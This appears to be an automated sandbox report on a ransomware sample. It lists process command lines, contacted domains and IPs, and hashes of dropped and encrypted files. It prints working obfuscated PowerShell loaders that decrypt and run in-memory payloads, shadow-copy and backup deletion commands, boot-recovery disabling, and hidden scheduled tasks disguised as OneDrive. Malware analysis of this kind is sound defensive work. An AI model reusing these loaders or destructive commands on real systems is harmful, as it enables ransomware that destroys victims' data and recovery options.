"C:\Users\Admin\AppData\Local\Temp\sv.bat.exe" -w hidden -c $QmQC='ElwQysewQysmwQysentwQysAwQystwQys'.Replace('wQys', '');$Cvyq='LowQysadwQys'.Replace('wQys', '');$Abka='GetwQysCurwQysrenwQystwQysProwQyscewQyssswQys'.Replace('wQys', '');$kkEJ='CrwQyseawQystewQysDewQyscrwQysyptwQysorwQys'.Replace('wQys', '');$uvnc='FrwQysomwQysBaswQyse64wQysStrwQysinwQysgwQys'.Replace('wQys', '');$oAYO='EwQysnwQystryPwQysowQysinwQystwQys'.Replace('wQys', '');$eVXi='ChawQysnwQysgewQysExwQystenwQyssiwQysowQysnwQys'.Replace('wQys', '');$KwUx='MwQysainwQysMowQysdwQysulwQysewQys'.Replace('wQys', '');$Nyws='InvowQyskewQys'.Replace('wQys', '');$JsiC='RwQyseadwQysLiwQysnewQysswQys'.Replace('wQys', '');$xxaz='SwQyspwQysliwQystwQys'.Replace('wQys', '');$OtLn='TrawQysnsfwQysormwQysFinwQysalwQysBlocwQyskwQys'.Replace('wQys', '');function coZUI($OpQVj){$aZVET=[System.Security.Cryptography.Aes]::Create();$aZVET.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aZVET.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aZVET.Key=[System.Convert]::$uvnc('iQPIhpce7ki6o+IHmlOhdoHm7HC8khIfOxAgdAkNw7A=');$aZVET.IV=[System.Convert]::$uvnc('NkX2UOU09KDD8//UYPJBsg==');$RGpCI=$aZVET.$kkEJ();$aARwL=$RGpCI.$OtLn($OpQVj,0,$OpQVj.Length);$RGpCI.Dispose();$aZVET.Dispose();$aARwL;}function fvMWD($OpQVj){$EEpkF=New-Object System.IO.MemoryStream(,$OpQVj);$pDChj=New-Object System.IO.MemoryStream;$BBOEV=New-Object System.IO.Compression.GZipStream($EEpkF,[IO.Compression.CompressionMode]::Decompress);$BBOEV.CopyTo($pDChj);$BBOEV.Dispose();$EEpkF.Dispose();$pDChj.Dispose();$pDChj.ToArray();}$YoalJ=[System.Linq.Enumerable]::$QmQC([System.IO.File]::$JsiC([System.IO.Path]::$eVXi([System.Diagnostics.Process]::$Abka().$KwUx.FileName, $null)), 1);$ZnOcq=$YoalJ.Substring(2).$xxaz(':');$njBYj=fvMWD (coZUI ([Convert]::$uvnc($ZnOcq[0])));$BkieQ=fvMWD (coZUI ([Convert]::$uvnc($ZnOcq[1])));[System.Reflection.Assembly]::$Cvyq([byte[]]$BkieQ).$oAYO.$Nyws($null,$null);[System.Reflection.Assembly]::$Cvyq([byte[]]$njBYj).$oAYO.$Nyws($null,$null);

C:\Users\Admin\AppData\Local\Temp\SRD.bat.exe

"C:\Users\Admin\AppData\Local\Temp\SRD.bat.exe" -w hidden -c $RwDC='InVBDevokVBDeeVBDe'.Replace('VBDe', '');$IGVN='CreVBDeatVBDeeDecVBDeryptVBDeorVBDe'.Replace('VBDe', '');$qKLC='LoaVBDedVBDe'.Replace('VBDe', '');$fwfx='TVBDeranVBDesfVBDeorVBDemVBDeFinVBDeaVBDelVBDeBlVBDeocVBDekVBDe'.Replace('VBDe', '');$QupE='FrVBDeoVBDemBaVBDese6VBDe4StVBDeriVBDengVBDe'.Replace('VBDe', '');$GEjb='ChVBDeangVBDeeEVBDextVBDeenVBDesionVBDe'.Replace('VBDe', '');$XbqZ='ReaVBDedLiVBDenesVBDe'.Replace('VBDe', '');$dNNl='ElVBDeemeVBDentVBDeAtVBDe'.Replace('VBDe', '');$niMU='EVBDentVBDeryPVBDeoinVBDetVBDe'.Replace('VBDe', '');$CXFs='GetCVBDeurVBDereVBDenVBDetPVBDerocVBDeessVBDe'.Replace('VBDe', '');$tMEM='SplVBDeitVBDe'.Replace('VBDe', '');$yGFh='MaVBDeinVBDeModVBDeulVBDeeVBDe'.Replace('VBDe', '');function RcHQK($SJfnN){$ePbJG=[System.Security.Cryptography.Aes]::Create();$ePbJG.Mode=[System.Security.Cryptography.CipherMode]::CBC;$ePbJG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$ePbJG.Key=[System.Convert]::$QupE('JDkzO6XH5gH021W2Y/ObVS2k+/ofiQdjxBF86RM/vL8=');$ePbJG.IV=[System.Convert]::$QupE('TPQFXcwHNdZ9KljZbDDnEA==');$uQtJU=$ePbJG.$IGVN();$QRiSY=$uQtJU.$fwfx($SJfnN,0,$SJfnN.Length);$uQtJU.Dispose();$ePbJG.Dispose();$QRiSY;}function nTqSF($SJfnN){$vKyUA=New-Object System.IO.MemoryStream(,$SJfnN);$flWoW=New-Object System.IO.MemoryStream;$gLlPI=New-Object System.IO.Compression.GZipStream($vKyUA,[IO.Compression.CompressionMode]::Decompress);$gLlPI.CopyTo($flWoW);$gLlPI.Dispose();$vKyUA.Dispose();$flWoW.Dispose();$flWoW.ToArray();}$fsXoM=[System.Linq.Enumerable]::$dNNl([System.IO.File]::$XbqZ([System.IO.Path]::$GEjb([System.Diagnostics.Process]::$CXFs().$yGFh.FileName, $null)), 1);$JMYTy=$fsXoM.Substring(2).$tMEM(':');$fhNaK=nTqSF (RcHQK ([Convert]::$QupE($JMYTy[0])));$Prmhn=nTqSF (RcHQK ([Convert]::$QupE($JMYTy[1])));[System.Reflection.Assembly]::$qKLC([byte[]]$Prmhn).$niMU.$RwDC($null,$null);[System.Reflection.Assembly]::$qKLC([byte[]]$fhNaK).$niMU.$RwDC($null,$null);

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\SRD')

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\sv')

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(1652);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(192);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\users\public\desktop\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "F:\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet

C:\Users\Admin\AppData\Roaming\hhftgie

C:\Users\Admin\AppData\Roaming\hhftgie

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneDrive_TbvDl' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\TbvDl.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneDrive_TYjHE' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\TYjHE.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Users\Admin\AppData\Roaming\hhftgie

C:\Users\Admin\AppData\Roaming\hhftgie

C:\Users\Admin\AppData\Local\Temp\bwll.exe

C:\Users\Admin\AppData\Local\Temp\bwll.exe

C:\Users\Admin\AppData\Local\Temp\bwll.exe

C:\Users\Admin\AppData\Local\Temp\bwll.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 serverlogs37.xyz udp
US 8.8.8.8:53 servblog757.xyz udp
DE 45.89.127.159:80 servblog757.xyz tcp
US 8.8.8.8:53 159.127.89.45.in-addr.arpa udp
NL 145.14.157.71:80 145.14.157.71 tcp
US 8.8.8.8:53 71.157.14.145.in-addr.arpa udp
US 8.8.8.8:53 septrex45.xyz udp
EE 159.253.18.136:80 septrex45.xyz tcp
US 8.8.8.8:53 136.18.253.159.in-addr.arpa udp
DE 45.89.127.159:80 servblog757.xyz tcp
US 20.189.173.14:443 tcp
US 8.8.8.8:53 86.8.109.52.in-addr.arpa udp
DE 45.89.127.159:80 servblog757.xyz tcp
US 8.8.8.8:53 adstat277xm.xyz udp
DE 45.89.125.136:4044 adstat277xm.xyz tcp
US 8.8.8.8:53 136.125.89.45.in-addr.arpa udp
US 8.8.8.8:53 septrex45.xyz udp
EE 159.253.18.136:80 septrex45.xyz tcp

Files

memory/2432-122-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2156-123-0x0000000001C70000-0x0000000001C79000-memory.dmp

memory/2432-124-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2432-126-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3200-125-0x0000000000AF0000-0x0000000000B06000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\FFA2.exe

MD5 6992433acbb1398c0b539d1cafdf47c4
SHA1 6761b00b2843b79ce8840d1b80170d8e13b588da
SHA256 5d5d5d0c1228f5b2f5589bdf7c247733ed40a0259a2d5969c75b9eb25a8b2304
SHA512 2dca1c59d8c56ebb41c7fef0f780318da299c91f25a9829d10327f5a70ccec40b0260a46554203c6a3d28fce80505f6b025e974cae201e6ff3724abc4a6bc6bc

C:\Users\Admin\AppData\Local\Temp\FFA2.exe

MD5 6992433acbb1398c0b539d1cafdf47c4
SHA1 6761b00b2843b79ce8840d1b80170d8e13b588da
SHA256 5d5d5d0c1228f5b2f5589bdf7c247733ed40a0259a2d5969c75b9eb25a8b2304
SHA512 2dca1c59d8c56ebb41c7fef0f780318da299c91f25a9829d10327f5a70ccec40b0260a46554203c6a3d28fce80505f6b025e974cae201e6ff3724abc4a6bc6bc

C:\Users\Admin\AppData\Local\Temp\233.exe

MD5 0f281d2506515a64082d6e774573afb7
SHA1 8949f27465913bf475fceb5796b205429083df58
SHA256 2288a0c896757647538a7dab5e0c980b70b173ed36c9e6206f6701dfd4112cfb
SHA512 f4ddb22c7dec04ca862d3df88e285025e02c185dbb2c061e9d0092ba3e8e8e083ca55612aae6b2d5792038729c55c0eaf193048991c0b06c8639a52017102622

C:\Users\Admin\AppData\Local\Temp\233.exe

MD5 0f281d2506515a64082d6e774573afb7
SHA1 8949f27465913bf475fceb5796b205429083df58
SHA256 2288a0c896757647538a7dab5e0c980b70b173ed36c9e6206f6701dfd4112cfb
SHA512 f4ddb22c7dec04ca862d3df88e285025e02c185dbb2c061e9d0092ba3e8e8e083ca55612aae6b2d5792038729c55c0eaf193048991c0b06c8639a52017102622

memory/3216-146-0x0000000000280000-0x00000000008DE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\3F9.exe

MD5 8d7ebe871589d79f195f240dcef43a57
SHA1 f5315edc9bfeb6f37c9df6ad1f10cb3363412d96
SHA256 19397c6dce459330095edc72759d1e79e26f1e12f013cdaee6dbdb90d65aaae8
SHA512 244be66bb480d320ef6d5cbfcd21e526a53726397c1fc4b512935bc50039b0bb773e3f12fd53910d3da9e69ebb8e3fd1a56d22d2fcb2e090c93c9759cdc497cd

C:\Users\Admin\AppData\Local\Temp\3F9.exe

MD5 8d7ebe871589d79f195f240dcef43a57
SHA1 f5315edc9bfeb6f37c9df6ad1f10cb3363412d96
SHA256 19397c6dce459330095edc72759d1e79e26f1e12f013cdaee6dbdb90d65aaae8
SHA512 244be66bb480d320ef6d5cbfcd21e526a53726397c1fc4b512935bc50039b0bb773e3f12fd53910d3da9e69ebb8e3fd1a56d22d2fcb2e090c93c9759cdc497cd

memory/3216-150-0x00000000051C0000-0x0000000005510000-memory.dmp

memory/2748-151-0x0000000000A50000-0x0000000000ABB000-memory.dmp

memory/3216-154-0x00000000013C0000-0x00000000013D0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\96f8e3a4-623f-4526-afa7-8c7592f60c75\AgileDotNetRT.dll

MD5 5f449db8083ca4060253a0b4f40ff8ae
SHA1 2b77b8c86fda7cd13d133c93370ff302cd08674b
SHA256 7df49cba50cc184b0fbb31349bd9f2b18acf5f7e7fac9670759efa48564eaef1
SHA512 4ce668cf2391422ef37963a5fd6c6251d414f63545efb3f1facb77e4695cd5a8af347bd77fc2bebfa7fd3ef10ff413a7acfde32957037a51c59806577351825f

memory/2748-161-0x0000000000AC0000-0x0000000000B40000-memory.dmp

memory/2748-162-0x0000000000A50000-0x0000000000ABB000-memory.dmp

\Users\Admin\AppData\Local\Temp\96f8e3a4-623f-4526-afa7-8c7592f60c75\AgileDotNetRT.dll

MD5 5f449db8083ca4060253a0b4f40ff8ae
SHA1 2b77b8c86fda7cd13d133c93370ff302cd08674b
SHA256 7df49cba50cc184b0fbb31349bd9f2b18acf5f7e7fac9670759efa48564eaef1
SHA512 4ce668cf2391422ef37963a5fd6c6251d414f63545efb3f1facb77e4695cd5a8af347bd77fc2bebfa7fd3ef10ff413a7acfde32957037a51c59806577351825f

memory/3216-164-0x00000000700A0000-0x0000000070680000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\233.exe

MD5 0f281d2506515a64082d6e774573afb7
SHA1 8949f27465913bf475fceb5796b205429083df58
SHA256 2288a0c896757647538a7dab5e0c980b70b173ed36c9e6206f6701dfd4112cfb
SHA512 f4ddb22c7dec04ca862d3df88e285025e02c185dbb2c061e9d0092ba3e8e8e083ca55612aae6b2d5792038729c55c0eaf193048991c0b06c8639a52017102622

memory/3216-169-0x00000000700A0000-0x0000000070680000-memory.dmp

memory/1464-170-0x00000000003E0000-0x00000000003EC000-memory.dmp

memory/1464-181-0x00000000003E0000-0x00000000003EC000-memory.dmp

memory/3216-183-0x00000000700A0000-0x0000000070680000-memory.dmp

memory/4952-184-0x0000000000780000-0x000000000078F000-memory.dmp

memory/2112-185-0x00000000001D0000-0x00000000001D5000-memory.dmp

memory/2748-186-0x0000000000A50000-0x0000000000ABB000-memory.dmp

memory/3616-187-0x0000000000680000-0x0000000000689000-memory.dmp

memory/3216-190-0x0000000072710000-0x0000000072790000-memory.dmp

memory/3216-191-0x0000000006590000-0x0000000006A8E000-memory.dmp

memory/3216-192-0x0000000006130000-0x00000000061C2000-memory.dmp

memory/3216-193-0x00000000060F0000-0x00000000060FA000-memory.dmp

memory/3616-194-0x00000000001D0000-0x00000000001D5000-memory.dmp

memory/3616-195-0x0000000000680000-0x0000000000689000-memory.dmp

memory/1904-198-0x0000000000400000-0x0000000000695000-memory.dmp

memory/3856-197-0x0000000000550000-0x000000000055B000-memory.dmp

memory/3856-199-0x0000000000550000-0x000000000055B000-memory.dmp

memory/3216-200-0x0000000006410000-0x000000000641C000-memory.dmp

memory/4768-201-0x00000000003E0000-0x00000000003EB000-memory.dmp

memory/4768-202-0x0000000000680000-0x0000000000689000-memory.dmp

memory/4768-203-0x00000000003E0000-0x00000000003EB000-memory.dmp

memory/2744-204-0x0000000000120000-0x000000000012F000-memory.dmp

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\233.exe

MD5 0f281d2506515a64082d6e774573afb7
SHA1 8949f27465913bf475fceb5796b205429083df58
SHA256 2288a0c896757647538a7dab5e0c980b70b173ed36c9e6206f6701dfd4112cfb
SHA512 f4ddb22c7dec04ca862d3df88e285025e02c185dbb2c061e9d0092ba3e8e8e083ca55612aae6b2d5792038729c55c0eaf193048991c0b06c8639a52017102622

memory/2744-271-0x00000000003E0000-0x00000000003EB000-memory.dmp

memory/2744-315-0x0000000000120000-0x000000000012F000-memory.dmp

memory/4224-343-0x0000000003130000-0x0000000003139000-memory.dmp

C:\Program Files\Common Files\microsoft shared\ClickToRun\C2R32.dll.id[5C6843C2-3483].[[email protected]].8base

MD5 762ec0d1f065d44d85ea6bc2e1bc4c02
SHA1 da62fa65beb435185aa65cd6426cc3abeb7f2eb1
SHA256 135faf4840a264d71d8038b09458469a8990f78712ce8344b483842ac6a646ae
SHA512 2a74dda17276738464f0b168cbbbb86d7c10f02cb83dc80c2f6ccf20c18dca97d9bd32631faa554683a950fac22b94d1762ea02b7fceb3d91c1c0526827cb3b2

memory/1236-429-0x0000000000700000-0x000000000070C000-memory.dmp

memory/4224-449-0x0000000003140000-0x000000000314B000-memory.dmp

memory/1236-451-0x0000000003140000-0x000000000314B000-memory.dmp

memory/1236-458-0x0000000000700000-0x000000000070C000-memory.dmp

memory/2916-627-0x00000000001A0000-0x00000000001A9000-memory.dmp

memory/3216-666-0x00000000700A0000-0x0000000070680000-memory.dmp

memory/4952-702-0x0000000000400000-0x0000000000695000-memory.dmp

memory/2916-724-0x0000000000700000-0x000000000070C000-memory.dmp

memory/2916-732-0x00000000001A0000-0x00000000001A9000-memory.dmp

memory/1592-792-0x00000000004F0000-0x00000000004F9000-memory.dmp

memory/3836-911-0x0000000000A80000-0x0000000000AA7000-memory.dmp

memory/3836-962-0x0000000000A80000-0x0000000000AA7000-memory.dmp

memory/2112-837-0x0000000000400000-0x0000000001B38000-memory.dmp

memory/1592-1049-0x00000000004F0000-0x00000000004F9000-memory.dmp

memory/3836-1061-0x00000000004F0000-0x00000000004F9000-memory.dmp

memory/1592-1017-0x00000000001A0000-0x00000000001A9000-memory.dmp

memory/4168-1224-0x0000000000B40000-0x0000000000B49000-memory.dmp

memory/3216-1405-0x00000000013C0000-0x00000000013D0000-memory.dmp

memory/4168-1457-0x0000000000B40000-0x0000000000B49000-memory.dmp

memory/4168-1433-0x0000000000A80000-0x0000000000AA7000-memory.dmp

memory/3968-1528-0x0000000000A20000-0x0000000000A2B000-memory.dmp

memory/3968-1801-0x0000000000B40000-0x0000000000B49000-memory.dmp

memory/3968-1832-0x0000000000A20000-0x0000000000A2B000-memory.dmp

memory/4328-1814-0x0000000001200000-0x000000000120D000-memory.dmp

memory/4328-1837-0x0000000001200000-0x000000000120D000-memory.dmp

memory/4904-2075-0x0000000000910000-0x000000000091B000-memory.dmp

memory/4904-2112-0x0000000001200000-0x000000000120D000-memory.dmp

memory/4904-2115-0x0000000000910000-0x000000000091B000-memory.dmp

memory/3616-2116-0x00000000001D0000-0x00000000001D5000-memory.dmp

memory/4768-2166-0x0000000000680000-0x0000000000689000-memory.dmp

memory/4952-2410-0x0000000000400000-0x0000000000695000-memory.dmp

memory/4224-2455-0x0000000003130000-0x0000000003139000-memory.dmp

memory/4224-2694-0x0000000003140000-0x000000000314B000-memory.dmp

memory/1236-2695-0x0000000003140000-0x000000000314B000-memory.dmp

memory/2916-3062-0x0000000000700000-0x000000000070C000-memory.dmp

memory/1592-3601-0x00000000001A0000-0x00000000001A9000-memory.dmp

memory/3836-3625-0x00000000004F0000-0x00000000004F9000-memory.dmp

memory/4168-3927-0x0000000000A80000-0x0000000000AA7000-memory.dmp

memory/3968-3933-0x0000000000B40000-0x0000000000B49000-memory.dmp

memory/4904-4096-0x0000000001200000-0x000000000120D000-memory.dmp

memory/3216-4472-0x00000000700A0000-0x0000000070680000-memory.dmp

memory/4952-4582-0x0000000000400000-0x0000000000695000-memory.dmp

memory/3216-5804-0x00000000700A0000-0x0000000070680000-memory.dmp

memory/4952-5805-0x0000000000400000-0x0000000000695000-memory.dmp

memory/3216-6506-0x0000000005160000-0x000000000516C000-memory.dmp

memory/3216-6507-0x00000000062C0000-0x000000000639C000-memory.dmp

memory/3216-6508-0x0000000008940000-0x0000000008A10000-memory.dmp

memory/3216-6509-0x000000000AFE0000-0x000000000B07C000-memory.dmp

memory/5080-6510-0x0000000000400000-0x0000000000493000-memory.dmp

memory/5080-6514-0x0000000000400000-0x0000000000493000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\FFA2.exe

MD5 6992433acbb1398c0b539d1cafdf47c4
SHA1 6761b00b2843b79ce8840d1b80170d8e13b588da
SHA256 5d5d5d0c1228f5b2f5589bdf7c247733ed40a0259a2d5969c75b9eb25a8b2304
SHA512 2dca1c59d8c56ebb41c7fef0f780318da299c91f25a9829d10327f5a70ccec40b0260a46554203c6a3d28fce80505f6b025e974cae201e6ff3724abc4a6bc6bc

memory/3216-6518-0x00000000700A0000-0x0000000070680000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\SRD.bat

MD5 809325b0bf02d5f44ce3d005b018cc12
SHA1 c39206a6b0e5dfaf5d4a50c5887b8400d55eda87
SHA256 136c478f4bd8baf478b13a43d31d62d69669c40453ca3fe81ddfebe2ff6ab0c4
SHA512 a8b1ee15056f625ebe89a9968b2820c7bad7fc76197f705d785ecee78fbe93355cae2d784cadfdf68fc23533ab2bc8e3bd67de9e1bba07b1c4f5d6c3529a7473

C:\Users\Admin\AppData\Local\Temp\sv.bat

MD5 ca039530887fa8dce08b07808582c4c7
SHA1 15b27c115ecf430bb3adccba408e6cdd6b94945c
SHA256 567b3fbd05b70248c6961e4cf5fc0196ae3f84d190402ca0d72e849007baf393
SHA512 9e7c3f51791c4c6aaa745622ae698cec04a75cbc716b267b4f258d599f56befab3d7142e2ce6dcac4d46d444fe2225c987ba1662788e47c39eb8538b7ab050d8

memory/4952-6791-0x0000000000400000-0x0000000000695000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\sv.bat.exe

MD5 be8ffebe1c4b5e18a56101a3c0604ea0
SHA1 2ec8af7c1538974d64291845dcb02111b907770f
SHA256 d2434e607451a4d29d28f43a529246dc81d25a2fae9c271e28c55452c09a28a5
SHA512 71008aa20932c8ecf48582d3b9678ba184e99d482daec9287a124f20af7184f1b02f800e2bdc83f6eb45832af6fdce88bfaf0e3398c617812969d0d27750fdeb

C:\Users\Admin\AppData\Local\Temp\SRD.bat.exe

MD5 be8ffebe1c4b5e18a56101a3c0604ea0
SHA1 2ec8af7c1538974d64291845dcb02111b907770f
SHA256 d2434e607451a4d29d28f43a529246dc81d25a2fae9c271e28c55452c09a28a5
SHA512 71008aa20932c8ecf48582d3b9678ba184e99d482daec9287a124f20af7184f1b02f800e2bdc83f6eb45832af6fdce88bfaf0e3398c617812969d0d27750fdeb

C:\Users\Admin\AppData\Local\Temp\sv.bat.exe

MD5 be8ffebe1c4b5e18a56101a3c0604ea0
SHA1 2ec8af7c1538974d64291845dcb02111b907770f
SHA256 d2434e607451a4d29d28f43a529246dc81d25a2fae9c271e28c55452c09a28a5
SHA512 71008aa20932c8ecf48582d3b9678ba184e99d482daec9287a124f20af7184f1b02f800e2bdc83f6eb45832af6fdce88bfaf0e3398c617812969d0d27750fdeb

memory/1652-7767-0x0000000007340000-0x0000000007376000-memory.dmp

memory/192-7917-0x0000000007A20000-0x0000000008048000-memory.dmp

memory/1652-7981-0x0000000007330000-0x0000000007340000-memory.dmp

memory/1652-8049-0x0000000007330000-0x0000000007340000-memory.dmp

memory/192-8125-0x00000000073E0000-0x00000000073F0000-memory.dmp

memory/192-8079-0x00000000073E0000-0x00000000073F0000-memory.dmp

memory/1652-8133-0x0000000007980000-0x00000000079A2000-memory.dmp

memory/192-8134-0x0000000007980000-0x00000000079E6000-memory.dmp

memory/1652-8142-0x00000000083D0000-0x0000000008436000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4waucdmz.h0j.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4952-10327-0x0000000000400000-0x0000000000695000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FFA2.exe.log

MD5 60d69d2b5d1e7e7074af60dc4cfb7e14
SHA1 57551403a4db1e00871dfba27f005e6ac6c8445e
SHA256 083784fac6930e24eb1f72f8a1ecb90916a92945a14d2b1e7270072b6eb93536
SHA512 0f114eac8579cc7117af526aedb31c37ca1de15683d5a26d52eae8d2d1f859eab32f35dd5d7b67bfde3dd1c5f9162b7ded3a114b68f722e3b82c598a6b07e14f

C:\Users\Admin\AppData\Local\Temp\SRD.bat.exe

MD5 be8ffebe1c4b5e18a56101a3c0604ea0
SHA1 2ec8af7c1538974d64291845dcb02111b907770f
SHA256 d2434e607451a4d29d28f43a529246dc81d25a2fae9c271e28c55452c09a28a5
SHA512 71008aa20932c8ecf48582d3b9678ba184e99d482daec9287a124f20af7184f1b02f800e2bdc83f6eb45832af6fdce88bfaf0e3398c617812969d0d27750fdeb

C:\Users\Admin\AppData\Local\Temp\sv.bat.exe

MD5 be8ffebe1c4b5e18a56101a3c0604ea0
SHA1 2ec8af7c1538974d64291845dcb02111b907770f
SHA256 d2434e607451a4d29d28f43a529246dc81d25a2fae9c271e28c55452c09a28a5
SHA512 71008aa20932c8ecf48582d3b9678ba184e99d482daec9287a124f20af7184f1b02f800e2bdc83f6eb45832af6fdce88bfaf0e3398c617812969d0d27750fdeb

C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001e.db.id[5C6843C2-3483].[[email protected]].8base

MD5 c30af3611107ff84027cbddd44a6c980
SHA1 3061146b9e22db52ed5f49387c863e7dd85c327f
SHA256 8be5159b9e64750edd60c7ab1092ad92d3cd5596ba1d9943690a354cf1ed8743
SHA512 4ef9d931ef6d42baec1b9baca6acd7fe16c7226d69ded4823482cf40ac51f2ab957532ded4360af95da4041a374ba973550b9a9293bd547fe77ea892ab8fe915

C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001d.db.id[5C6843C2-3483].[[email protected]].8base

MD5 4d7beebb09e1dd4cd084d58330f96823
SHA1 85baa912553817067e50b02ccc04a4fc8e20c262
SHA256 275f56a42802643602371d52da75421ee87c88e9e626d1acf3fa348af061100c
SHA512 21744339d89233fa8ba3074e6d9cc2a701b52bf91f6bfcc8286683ba188f21026ae845c898809db66d9987401f9fe5f46ec4dfec0605b0252127be4fb7545210

C:\Users\Admin\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

MD5 0fde5c2f4eb4f8a284d6b6c450059725
SHA1 5addc49f3fcd3b64529fbbe86b20f9c3e2bf0226
SHA256 84f6a22c31581883396ee29420c5fb7f02bb342d51ba7d7c88972da497bbf08b
SHA512 6963fcdd57119c70aee0bfb15819e0a85f5103033f6a0512c16cf7473babdefd72d9d6a168eb68e96de18714f99cbc3761d90124a9431e3f2557a39f27a2f9ce

C:\Users\Admin\AppData\Local\Temp\30C4\C\Windows\InfusedApps\Packages\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\Microsoft.Wallet.exe

MD5 a4bd1ce8b5026e59037a3903cd6e4e3a
SHA1 352243b758a585cf869cd9f9354cd302463f4d9d
SHA256 39d69cd43e452c4899dbf1aa5b847c2a2d251fb8e13df9232ebdb5f0fdc3594c
SHA512 c86901a1bdcebc5721743fca6ac7f1909b64518e046752f3b412183db940563c088e0ec12613ad0b763c814bc3b6bf99dd3b6f8a6bce54add30a10d29e38400c

C:\Users\Admin\AppData\Local\Temp\30C4\C\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-OneCore-WalletService-Package~31bf3856ad364e35~amd64~es-ES~10.0.15063.0.cat

MD5 faa07d386fa388cf5a897b2351a7f162
SHA1 35dd781658d43bd7d03e37f9dee0cc4f2f7402d0
SHA256 a063565058df9e6b85b83793c00f86581fca7609b1ac5d3f55bbcf4c952147ca
SHA512 7a29302ead2b150b6915138b87d993e3cfd2c407cad25b7a2feb7c95684669d1013fe9f2aaf1ad13c9f6d68da39c93136caecf5181df078497aa82e5079bf14f

C:\Users\Admin\AppData\Local\Temp\30C4\C\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-OneCore-WalletService-Package~31bf3856ad364e35~amd64~en-US~10.0.15063.0.cat

MD5 52da87ceed52ee597076e58c7ffda14a
SHA1 655c2bf68d4cf2185a22a47018a075a3d32ff9c8
SHA256 aae12e25aded994b7024d858eab9aea235e6483ad5402a954b4ee8c5c2fbbf6a
